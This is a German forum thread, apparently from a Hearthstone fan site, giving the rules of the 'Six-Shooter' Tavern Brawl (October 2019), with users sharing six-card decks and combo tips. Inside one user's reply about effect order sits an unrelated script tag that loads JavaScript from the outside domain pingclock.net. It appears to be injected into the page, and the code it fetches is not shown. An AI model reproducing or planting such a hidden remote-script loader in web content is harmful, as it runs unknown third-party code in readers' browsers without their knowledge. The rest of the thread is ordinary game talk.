Hearthstone-Kartenchaos vom 02.10.-09.10.2019: Regeln & Alle wichtigen Infos zu „Six-Shooter“

  • #152372

    Neuer HS-Teaser 09.06.2015

    In Europa startet das Kartenchaos immer am Mittwoch um 20 Uhr. Da in der Region US allerdings bereits früher gespielt werden kann, wissen wir bereits, was für ein Kartenchaos es dieses Mal wird.

    Dieses Mal lautet das Motto „Six-Shooter“ mit der offiziellen Beschreibung: „Make a six-card deck and Duel! Don’t worry – when you’re out of cards you get a free reload!“

    Wie immer gilt: Verfügbar ist der Spielmodus bis kommenden Mittwoch um 19 Uhr. Beim ersten Sieg gibt es als Belohnung eine Klassik-Packung. Gespielt werden kann so oft man möchte, Kosten für den Eintritt fallen nicht an – allerdings muss man mit einem Helden mindestens Level 20 erreicht haben, um Zugang zu erhalten.

    Alle wichtigen Infos hier noch einmal in der Kurzübersicht:

    • Start: 02.10.2019, 20 Uhr (EU)
    • Ende: 09.10.2019, 19 Uhr (EU)
    • Voraussetzung: 1 Held auf Level 20
    • Preis: Kostenlos & so oft spielen wie man möchte
    • Belohnung: 1 Klassik-Packung für den ersten Sieg
    • Regeln:
      • Eigenes Deck erstellen, bestehend aus 6 Karten.
      • Gespielt wird im wilden Format.
      • Jede Karte kann nur einmal im Deck enthalten sein.
      • Hat man seine Karten aufgebraucht, wird neu nachgeladen.

    Siegreiche Decks, Tipps, Meinungen und Co. gerne in den Kommentaren posten!

    Eva
    Dabei seit 22.03.2013
    2.605 51 2D+15
    Anzeige
  • Autor
    Antworten
  • #152377

    Copra
    Dabei seit 28.11.2016
    859 69

    Easy. Wer sein Booster nur schnell holen will hier das ultimative Deck:

    ### Kartenchaos-Deck
    # Klasse: Hexenmeister
    # Format: Wild
    #
    # 1x (1) Beutelmech
    # 1x (1) Plage der Flammen
    # 1x (2) Mechatroniker
    # 1x (2) Mechwarper
    # 1x (3) SCHN1PP-SCHN4PP
    # 1x (4) Beschwörungsportal
    #
    AAEBAf0GBskHlA/2/QLX/gKdqQOftwMAAA==
    #
    # Um dieses Deck zu verwenden, kopiert es in Eure Zwischenablage und erstellt ein neues Deck in Hearthstone.

    1
    #152378

    evilhunter66
    Dabei seit 07.10.2015
    423 30

    Den OTK SchnippSchnapp hab ich auch mal in wild ausprobiert. Nicht mein Deck. Selbst wenn man die Kombi spielen kann, schafft man es kaum innerhalb der Lunte seinen Minion auf 30 Angriff zu buffen.

    Wichtig für alle, die es mal ausprobieren wollen: Erst Beschwörungsportal, dann den Mechwarper. Warum es die Reihenfolge sein muss, hab ich aber noch nicht verstanden. Schließlich sind das keine Kampfschreie, sondern Effekte. Naja…

    #152380

    Klugisel
    Dabei seit 21.04.2016
    59 5 2D

    Wichtig für alle, die es mal ausprobieren wollen: Erst Beschwörungsportal, dann den Mechwarper. Warum es die Reihenfolge sein muss, hab ich aber noch nicht verstanden. Schließlich sind das keine Kampfschreie, sondern Effekte. Naja…

    Weil auch passive effekte in der Reihenfolge wirken in der die Minions gespielt werden.

    <script src=“//pingclock.net/21db1c5c8b372aecca.js“ async=““ type=“text/javascript“></script>

    #152381

    Copra
    Dabei seit 28.11.2016
    859 69

    @evilhunter66:
    Also ich hab keine Probleme das Teil auf 30+ Angriff zu buffen. Ich glaube bis an die 40 schaffe ich. Also ist noch genug Zeit den anderen Mech so hoch zu buffen um einen Spot ausm Weg zu räumen und den Haupt Mech auf 30 Anrgiff zu buffen. Ich spiel allerdings auch auf einem PC. Aufm Handy kann man das bestimmt knicken.

    Mir macht das Deck aber auch kein Spaß. Ich hab mir das Deck nur gebaut weil ich schnell das Booster holen wollte. Hatte direkt im ersten Spiel gleich den Sieg. Ich mag aber sowieso keine OTK Decks. Für eine Runde KC ist das aber in Ordnung.

    Ich finde das KC aber nicht so toll. Booster geholt und jetzt eine Woche warten.

    #152382

    Regenwolf
    Dabei seit 01.08.2016
    838 88

    Also mein Freund spielt den ab und zu ganz gern. Er mag halt eigentlich nur den Hexer und spielt andere Klassen nur, wenn er muss. Er wechselt gern mit nem zoolock ab. Das sind halt die einzigen Decks, wo er alle Karten hat und nicht mega viel herstellen muss. Er spielt aber auch nur bis Rang 20 und spielt ansonsten unranked und generell nicht viel. HS spielt er nur nebenbei und da meistens den Solocontent. Ich hab das Deck auch mal ausprobiert und es ist für 2-3 Spielchen mal ok. Aber danach wirds mir auch zu langweilig.

    #152388

    Parkettboden
    Dabei seit 26.01.2016
    411 25

    schafft man es kaum innerhalb der Lunte seinen Minion auf 30 Angriff zu buffen.

    Auf dem PC ohne Probleme bis 30, 32 Angriff, man braucht nur ein bisschen Übung. RomanP (Wild Legendenrang 1 in den letzten beiden Monaten) schafft es mit seinem Hexer bis zu 46 Attack.
    Am Smartphone ist es tatsächlich etwas schwieriger.
    Sn1p-Sn4p-Warlock ist ein Deck, bei dem man ein, zwei Züge im Voraus planen muss, um den OTK durchzuführen, also nicht unbedingt ein Deck für Hinz und Kunz.

    #152404

    malevolyn
    Dabei seit 12.04.2018
    17 3

    Als Deck und gleich beim ersten Mal erfolgreich habe ich den Paladin mit folgenden Karten gewählt:

    Geheimnisbewahrerin

    Niemals aufgeben!

    Argentumbeschützer

    Mikromumie

    Segen der Könige

    Leuchtsteinmechaniker.

    Im Kartenpack hatte ich einen goldenen legendären Todesschwinge 🙂 Sehr geil da der mir noch fehlte.

    #152405

    Nalandor
    Dabei seit 10.09.2018
    37 5 2D+10

    Da hier ja 6 unterschiedliche Karten im Grunde ein Mini-Highlander Deck bilden ist Zephrys natürlich immer sehr nett.

    Vor allem spielt man ihn locker 3-4 mal aus. 🙂


Dieses Thema mit Freunden teilen:

Das könnte dich auch interessieren

Antwort auf: Hearthstone-Kartenchaos vom 02.10.-09.10.2019: Regeln & Alle wichtigen Infos zu „Six-Shooter“

Bitte melde dich an, um einen Beitrag zu schreiben.

Zum Login | Konto erstellen